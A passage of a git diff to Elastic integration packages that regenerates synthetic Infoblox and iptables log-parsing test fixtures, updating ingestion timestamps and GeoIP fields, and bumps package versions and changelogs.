"preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 22 23:52:50 tDuisaut3296.www.invalid scheduled_ftp_backups[imvenia]: Scheduled backup to the spi was successful - Backup file stquido", "event": { - "ingested": "2021-06-09T11:22:12.539607400Z" + "ingested": "2021-12-14T14:46:58.554809651Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "September 6 06:55:24 upta3300.www.home 10.233.48.103 diskcheck: leumiur", "event": { - "ingested": "2021-06-09T11:22:12.539612Z" + "ingested": "2021-12-14T14:46:58.554810513Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "September 20 
13:57:58 vita2681.www5.local tobea: controld Distribution Complete", "event": { - "ingested": "2021-06-09T11:22:12.539616700Z" + "ingested": "2021-12-14T14:46:58.554811196Z" }, - "tags": [ + "ecs": { + "version": "1.12.0" + }, + "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "October 4 21:00:32 ersp3536.www5.lan 10.93.90.240 rsyncd: sent 1792 bytes received 7387 bytes total size tes", "event": { - "ingested": "2021-06-09T11:22:12.539621500Z" + "ingested": "2021-12-14T14:46:58.554811897Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Oct 19 04:03:07 tnulapa7592.www.local DIS[eriti]: litessec: itas: Attempting discover-now for 10.251.106.205 on mporin, using session ID", "event": { - "ingested": "2021-06-09T11:22:12.539626300Z" + "ingested": "2021-12-14T14:46:58.554812598Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 2 11:05:41 roid6604.www.test -:syslog Nemoenim", "event": { - "ingested": "2021-06-09T11:22:12.539631Z" + "ingested": "2021-12-14T14:46:58.554813364Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 16 18:08:15 nihil657.domain validate_dhcpd[rsitv]: iciade", "event": { - "ingested": "2021-06-09T11:22:12.539635900Z" + "ingested": "2021-12-14T14:46:58.554814234Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "December 1 01:10:49 ven660.api.lan amnih: watchdog cancel, pid = 3981", "event": { - "ingested": "2021-06-09T11:22:12.539640600Z" + "ingested": "2021-12-14T14:46:58.554815049Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "December 15 08:13:24 
atatn7364.internal.localdomain debug_mount[ofdeFin]: mount essequam", "event": { - "ingested": "2021-06-09T11:22:12.539645400Z" + "ingested": "2021-12-14T14:46:58.554815788Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "December 29 15:15:58 umqu301.internal.home init[inesci]: isnisi", "event": { - "ingested": "2021-06-09T11:22:12.539662500Z" + "ingested": "2021-12-14T14:46:58.554816519Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "January 12 22:18:32 riamea1540.www.host -:ntpd_initres ntpd exiting on signal 15", "event": { - "ingested": "2021-06-09T11:22:12.539668900Z" + "ingested": "2021-12-14T14:46:58.554817491Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "January 27 05:21:06 siut5663.local piscinge: rcsysinit fsck from 1.271", "event": { - "ingested": "2021-06-09T11:22:12.539674300Z" + "ingested": "2021-12-14T14:46:58.554818273Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "February 10 12:23:41 cinge7339.api.corp -:diskcheck vitaedi", "event": { - "ingested": "2021-06-09T11:22:12.539679300Z" + "ingested": "2021-12-14T14:46:58.554819007Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "February 24 19:26:15 dolore7072.www5.localhost ect: logger modocons", "event": { - "ingested": "2021-06-09T11:22:12.539684100Z" + "ingested": "2021-12-14T14:46:58.554819719Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "March 11 02:28:49 odoconse228.mail.localdomain -:syslog-ng veli", "event": { - "ingested": "2021-06-09T11:22:12.539688900Z" + "ingested": 
"2021-12-14T14:46:58.554820437Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "March 25 09:31:24 labo267.internal.localhost httpd[etdo]: 2018-3-25 9:31:24.par [lorin]: Login_Denied - - to=pitl ip=10.204.128.215 info=ama", "event": { - "ingested": "2021-06-09T11:22:12.539693700Z" + "ingested": "2021-12-14T14:46:58.554821047Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Apr 8 16:33:58 roidents6540.internal.corp -:debug tametcon", "event": { - "ingested": "2021-06-09T11:22:12.539698300Z" + "ingested": "2021-12-14T14:46:58.554821729Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 22 23:36:32 miurerep1152.internal.domain pidof[utlab]: can't read sid from emUteni", "event": { - "ingested": "2021-06-09T11:22:12.539702600Z" + "ingested": "2021-12-14T14:46:58.554822364Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "May 07 06:39:06 inimve2352.lan :captured_dns_uploader mco", "event": { - "ingested": "2021-06-09T11:22:12.539707200Z" + "ingested": "2021-12-14T14:46:58.554823008Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "May 21 13:41:41 amcorp1275.www5.host netauto_core[liqua]: netautoctl:olo", "event": { - "ingested": "2021-06-09T11:22:12.539711900Z" + "ingested": "2021-12-14T14:46:58.554823711Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Jun 04 20:44:15 fdeF593.internal.lan DIS[niamq]: lapariat: remagn: Attempting discover-now for 10.238.140.186 on tiaec, using session ID", "event": { - "ingested": "2021-06-09T11:22:12.539716700Z" + 
"ingested": "2021-12-14T14:46:58.554824659Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "June 19 03:46:49 upt4986.mail.corp ntpdate[idunt]: luptat", "event": { - "ingested": "2021-06-09T11:22:12.539721400Z" + "ingested": "2021-12-14T14:46:58.554825364Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "July 3 10:49:23 lillum7809.mail.local taedicta: logger ritt", "event": { - "ingested": "2021-06-09T11:22:12.539726100Z" + "ingested": "2021-12-14T14:46:58.554826060Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "July 17 17:51:58 tetur2694.mail.local ipi: openvpn-member OpenVPN 1.7727 [ipv6-icmp] [uaeab] itinv", "event": { - "ingested": "2021-06-09T11:22:12.539730600Z" + "ingested": "2021-12-14T14:46:58.554826785Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 1 00:54:32 utaliqu6138.mail.localhost nvolupt: pidof can't read sid from oremi", "event": { - "ingested": "2021-06-09T11:22:12.539735200Z" + "ingested": "2021-12-14T14:46:58.554827592Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 15 07:57:06 atcupi2332.mail.localdomain -:INFOBLOX-Grid Upgrade to ore", "event": { - "ingested": "2021-06-09T11:22:12.539739700Z" + "ingested": "2021-12-14T14:46:58.554828404Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 29 14:59:40 luptatem6874.mail.test purge_scheduled_tasks[dat]: Scheduled tasks have been purged", "event": { - "ingested": "2021-06-09T11:22:12.539744500Z" + "ingested": "2021-12-14T14:46:58.554829225Z" + }, + "ecs": { + 
"version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "September 12 22:02:15 tame4953.mail.localhost prehen: restarting ntutlabo", "event": { - "ingested": "2021-06-09T11:22:12.539749700Z" + "ingested": "2021-12-14T14:46:58.554829953Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "September 27 05:04:49 sequa1715.www5.domain sshd[eirure]: Accepted password for root from 10.210.113.252 port 4184 udp", "event": { - "ingested": "2021-06-09T11:22:12.539754700Z" + "ingested": "2021-12-14T14:46:58.554830764Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "October 11 12:07:23 tconsec5315.internal.example :kernel Linux version 1.341 (fugi) (labo) nostrud", "event": { - "ingested": "2021-06-09T11:22:12.539759600Z" + "ingested": "2021-12-14T14:46:58.554831520Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "October 25 19:09:57 cupi1867.www5.test :rcsysinit orroq", "event": { - "ingested": "2021-06-09T11:22:12.539764600Z" + "ingested": "2021-12-14T14:46:58.554832361Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 9 02:12:32 rcit2043.api.home 10.107.45.175 smart_check_io: ssecil", "event": { - "ingested": "2021-06-09T11:22:12.539769400Z" + "ingested": "2021-12-14T14:46:58.554833108Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 23 09:15:06 mes4801.internal.test 10.243.121.97 python: cancel: FQDN='illu4875.api.host', View='tatevel'", "event": { - "ingested": "2021-06-09T11:22:12.539774100Z" + "ingested": "2021-12-14T14:46:58.554833848Z" + }, + "ecs": { + "version": 
"1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "December 7 16:17:40 its7867.internal.invalid 10.44.115.94 debug_mount: mount isn", "event": { - "ingested": "2021-06-09T11:22:12.539778900Z" + "ingested": "2021-12-14T14:46:58.554834605Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Dec 21 23:20:14 equ4808.www.localhost DIS[siuta]: urmagn:dquia: Devicetemporin/10.46.166.75login failuresuccess", "event": { - "ingested": "2021-06-09T11:22:12.539784100Z" + "ingested": "2021-12-14T14:46:58.554835636Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Jan 05 06:22:49 idi7668.www5.test rum: captured_dns_uploader eataevi", "event": { - "ingested": "2021-06-09T11:22:12.539789300Z" + "ingested": "2021-12-14T14:46:58.554836234Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "January 19 13:25:23 iqu4614.www5.example 10.60.211.199 init: modocon", "event": { - "ingested": "2021-06-09T11:22:12.539794100Z" + "ingested": "2021-12-14T14:46:58.554836915Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "February 2 20:27:57 agnaaliq1829.mail.test :ntpd_initres ntpd exiting on signal 15", "event": { - "ingested": "2021-06-09T11:22:12.539798500Z" + "ingested": "2021-12-14T14:46:58.554837571Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "February 17 03:30:32 col3570.www.invalid tinvolup: sSMTP Sent mail for tsed (inv) uid=rroq username=rcit outbytes=2807", "event": { - "ingested": "2021-06-09T11:22:12.539803600Z" + "ingested": "2021-12-14T14:46:58.554838282Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": 
[ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "March 3 10:33:06 mipsamvo4282.api.home reetdo: init oreveri", "event": { - "ingested": "2021-06-09T11:22:12.539808300Z" + "ingested": "2021-12-14T14:46:58.554839174Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "March 17 17:35:40 Except6889.www.corp -:rc3 umetMal", "event": { - "ingested": "2021-06-09T11:22:12.539813100Z" + "ingested": "2021-12-14T14:46:58.554839835Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Apr 1 00:38:14 umq1309.api.test uae: debug mve", "event": { - "ingested": "2021-06-09T11:22:12.539817900Z" + "ingested": "2021-12-14T14:46:58.554840588Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 15 07:40:49 tatem4180.www.home 10.102.166.19 python: deny: FQDN='eritatis6343.api.local', View='mquisn'", "event": { - "ingested": "2021-06-09T11:22:12.539822700Z" + "ingested": "2021-12-14T14:46:58.554841308Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 29 14:43:23 quir7168.api.localdomain labore: syslog uela", "event": { - "ingested": "2021-06-09T11:22:12.539827500Z" + "ingested": "2021-12-14T14:46:58.554842060Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "May 13 21:45:57 iuntNequ7202.api.domain -:controld Distribution Complete", "event": { - "ingested": "2021-06-09T11:22:12.539832400Z" + "ingested": "2021-12-14T14:46:58.554842829Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "May 28 04:48:31 veniamq1236.invalid emo: radiusd itq", "event": 
{ - "ingested": "2021-06-09T11:22:12.539838300Z" + "ingested": "2021-12-14T14:46:58.554843702Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "June 11 11:51:06 nderiti409.api.domain -:syslog Cic", "event": { - "ingested": "2021-06-09T11:22:12.539843200Z" + "ingested": "2021-12-14T14:46:58.554844348Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "June 25 18:53:40 tatem6156.www.local :dhcpd received shutdown -/-/ success", "event": { - "ingested": "2021-06-09T11:22:12.539852100Z" + "ingested": "2021-12-14T14:46:58.554845094Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "July 10 01:56:14 uamnihil6127.api.domain 10.29.119.245 python: accept: 'olli3116.internal.example' in view 'rsp'.", "event": { - "ingested": "2021-06-09T11:22:12.539857100Z" + "ingested": "2021-12-14T14:46:58.554845837Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Jul 24 08:58:48 roquisqu1205.api.domain netauto_core[nim]: utaliqu: Attempting CLI on devicersiwith interface not in table, ip10.118.155.14", "event": { - "ingested": "2021-06-09T11:22:12.539862200Z" + "ingested": "2021-12-14T14:46:58.554846574Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 7 16:01:23 suntex5169.www.example phonehome[esci]: uov", "event": { - "ingested": "2021-06-09T11:22:12.539867200Z" + "ingested": "2021-12-14T14:46:58.554847286Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 21 23:03:57 fici5161.www5.example olup: debug_mount mount aco", "event": { - "ingested": 
"2021-06-09T11:22:12.539871900Z" + "ingested": "2021-12-14T14:46:58.554848049Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "September 5 06:06:31 orsi7617.www5.corp lorsita: shutdown shutting down for system reboot", "event": { - "ingested": "2021-06-09T11:22:12.539876500Z" + "ingested": "2021-12-14T14:46:58.554849212Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "September 19 13:09:05 osamnis4912.mail.host npr: radiusd etconsec", "event": { - "ingested": "2021-06-09T11:22:12.539881Z" + "ingested": "2021-12-14T14:46:58.554849959Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Oct 03 20:11:40 urExcept6809.www5.corp captured_dns_uploader[atcupida]: tessequa", "event": { - "ingested": "2021-06-09T11:22:12.539885700Z" + "ingested": "2021-12-14T14:46:58.554850800Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Oct 18 03:14:14 icab3519.localdomain dhcpdv6[plicaboN]: Encapsulated Renew message from 2001:db8::b1f51444:f88dd359 port 2496 from client DUID acommo, transaction ID isi", "event": { - "ingested": "2021-06-09T11:22:12.539890100Z" + "ingested": "2021-12-14T14:46:58.554851612Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 1 10:16:48 abor4353.www5.host ame: python tesseq", "event": { - "ingested": "2021-06-09T11:22:12.539894600Z" + "ingested": "2021-12-14T14:46:58.554852404Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 15 17:19:22 olorem290.api.lan sshd[culpaqui]: deny: logout() unknown", "event": { - "ingested": 
"2021-06-09T11:22:12.539899200Z" + "ingested": "2021-12-14T14:46:58.554853191Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 30 00:21:57 ventore3612.www.home purge_scheduled_tasks[emp]: Scheduled tasks have been purged", "event": { - "ingested": "2021-06-09T11:22:12.539903900Z" + "ingested": "2021-12-14T14:46:58.554853965Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Dec 14 07:24:31 uptatem4483.localhost tacacs_acct[inrepr]: mol: Server 10.111.52.69 port 6073: asperna", "event": { - "ingested": "2021-06-09T11:22:12.539908800Z" + "ingested": "2021-12-14T14:46:58.554855114Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" diff --git a/packages/infoblox/manifest.yml b/packages/infoblox/manifest.yml index ae9bb5dee85..2dd3d8b19c8 100644 --- a/packages/infoblox/manifest.yml +++ b/packages/infoblox/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: infoblox title: Infoblox NIOS Logs -version: 0.6.0 +version: 0.6.1 description: Collect NIOS logs from Infoblox devices with Elastic Agent. categories: ["network"] release: experimental diff --git a/packages/iptables/changelog.yml b/packages/iptables/changelog.yml index e6532da1ae0..d04234cefe6 100644 --- a/packages/iptables/changelog.yml +++ b/packages/iptables/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "0.6.2" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "0.6.1" changes: - description: Change test public IPs to the supported subset diff --git a/packages/iptables/data_stream/log/_dev/test/pipeline/test-iptables-raw.log-expected.json b/packages/iptables/data_stream/log/_dev/test/pipeline/test-iptables-raw.log-expected.json index 0e53091d6e7..e1a57c17452 100644 
--- a/packages/iptables/data_stream/log/_dev/test/pipeline/test-iptables-raw.log-expected.json +++ b/packages/iptables/data_stream/log/_dev/test/pipeline/test-iptables-raw.log-expected.json @@ -42,6 +42,18 @@ "id": "default" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "port": 38842, "mac": "90:10:65:29:b6:2a", "ip": "67.43.156.15" @@ -76,7 +88,7 @@ }, "event": { "action": "drop", - "ingested": "2021-12-09T13:39:42.195706800Z", + "ingested": "2021-12-14T14:47:01.888409439Z", "original": "\u003c161\u003eOct 10 07:25:12 Hostname kernel: [wan-lan-default-D]IN=eth0 OUT= MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=67.43.156.15 DST=10.4.0.5 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=38842 DPT=443 WINDOW=2853 RES=0x00 ACK URGP=0", "type": [ "denied", @@ -130,6 +142,18 @@ "id": "default" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "port": 38842, "mac": "90:10:65:29:b6:2a", "ip": "67.43.156.15" @@ -164,7 +188,7 @@ }, "event": { "action": "drop", - "ingested": "2021-12-09T13:39:42.195716800Z", + "ingested": "2021-12-14T14:47:01.888412753Z", "original": "\u003c6\u003e2021-03-12T14:10:18Z Hostname kernel: [wan-lan-default-D]IN=eth0 OUT= MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=67.43.156.15 DST=10.4.0.5 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=38842 DPT=443 WINDOW=2853 RES=0x00 ACK URGP=0", "type": [ "denied", @@ -213,6 +237,18 @@ "id": "default" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "port": 38842, "mac": "90:10:65:29:b6:2a", "ip": "67.43.156.15" 
@@ -247,7 +283,7 @@ }, "event": { "action": "drop", - "ingested": "2021-12-09T13:39:42.195726300Z", + "ingested": "2021-12-14T14:47:01.888413240Z", "original": "2021-03-12T14:10:18Z Hostname kernel: [wan-lan-default-D]IN=eth0 OUT= MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=67.43.156.15 DST=10.4.0.5 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=38842 DPT=443 WINDOW=2853 RES=0x00 ACK URGP=0", "type": [ "denied", @@ -274,23 +310,6 @@ }, "ttl": 118 }, - "destination": { - "mac": "90:10:28:5f:62:24", - "ip": "192.168.2.83" - }, - "source": { - "mac": "90:10:18:5a:89:2a", - "ip": "192.168.2.71" - }, - "message": "DENY: IN=eth0 OUT= MAC=90:10:28:5f:62:24:90:10:18:5a:89:2a:08:00 SRC=192.168.2.71 DST=192.168.2.83 LEN=88 TOS=0x00 PREC=0x00 TTL=118 ID=21684 PROTO=ICMP TYPE=3 CODE=3 [SRC=192.168.2.83 DST=192.168.173.191 LEN=60 TOS=0x00 PREC=0x00 TTL=54 ID=0 DF PROTO=UDP SPT=21458 DPT=62936 LEN=40 ]", - "tags": [ - "preserve_original_event" - ], - "network": { - "type": "ipv4", - "community_id": "1:v5jWdgB//QU/ZfG9vivofYLpWjA=", - "transport": "icmp" - }, "@timestamp": "2021-01-08T03:37:09.000Z", "ecs": { "version": "1.12.0" 
@@ -301,9 +320,18 @@ "192.168.2.83" ] }, + "destination": { + "mac": "90:10:28:5f:62:24", + "ip": "192.168.2.83" + }, + "source": { + "mac": "90:10:18:5a:89:2a", + "ip": "192.168.2.71" + }, + "message": "DENY: IN=eth0 OUT= MAC=90:10:28:5f:62:24:90:10:18:5a:89:2a:08:00 SRC=192.168.2.71 DST=192.168.2.83 LEN=88 TOS=0x00 PREC=0x00 TTL=118 ID=21684 PROTO=ICMP TYPE=3 CODE=3 [SRC=192.168.2.83 DST=192.168.173.191 LEN=60 TOS=0x00 PREC=0x00 TTL=54 ID=0 DF PROTO=UDP SPT=21458 DPT=62936 LEN=40 ]", "event": { "action": "deny", - "ingested": "2021-12-09T13:39:42.195732600Z", + "ingested": "2021-12-14T14:47:01.888413690Z", "original": "Jan 8 03:37:09 DENY: IN=eth0 OUT= MAC=90:10:28:5f:62:24:90:10:18:5a:89:2a:08:00 SRC=192.168.2.71 DST=192.168.2.83 LEN=88 TOS=0x00 PREC=0x00 TTL=118 ID=21684 PROTO=ICMP TYPE=3 CODE=3 [SRC=192.168.2.83 DST=192.168.173.191 LEN=60 TOS=0x00 PREC=0x00 TTL=54 ID=0 DF PROTO=UDP SPT=21458 DPT=62936 LEN=40 ]", "type": [ "denied", @@ -313,6 +341,14 @@ "network" ], "kind": "event" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "type": "ipv4", + "community_id": "1:v5jWdgB//QU/ZfG9vivofYLpWjA=", + "transport": "icmp" } }, { @@ -344,20 +380,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "port": 17805, 
@@ -388,7 +418,7 @@ }, "event": { "action": "drop_input", - "ingested": "2021-12-09T13:39:42.195737Z", + "ingested": "2021-12-14T14:47:01.888414088Z", "original": "Jan 8 03:37:09 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=81.2.69.143 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=115 ID=15743 DF PROTO=TCP SPT=17805 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0 ", "type": [ "denied", @@ -452,7 +482,7 @@ }, "event": { "action": "drop_input", - "ingested": "2021-12-09T13:39:42.195742Z", + "ingested": "2021-12-14T14:47:01.888414560Z", "original": "Jan 8 03:37:57 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00 SRC=192.168.100.198 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=243 ID=17703 PROTO=TCP SPT=47091 DPT=1433 WINDOW=1024 RES=0x00 SYN URGP=0 ", "type": [ "denied", @@ -493,20 +523,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "port": 59319, @@ -537,7 +561,7 @@ }, "event": { "action": "drop_input", - "ingested": "2021-12-09T13:39:42.195748100Z", + "ingested": "2021-12-14T14:47:01.888415074Z", "original": "Jan 8 03:38:45 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=81.2.69.143 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=115 ID=19619 DF PROTO=TCP SPT=59319 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0 ", "type": [ "denied", 
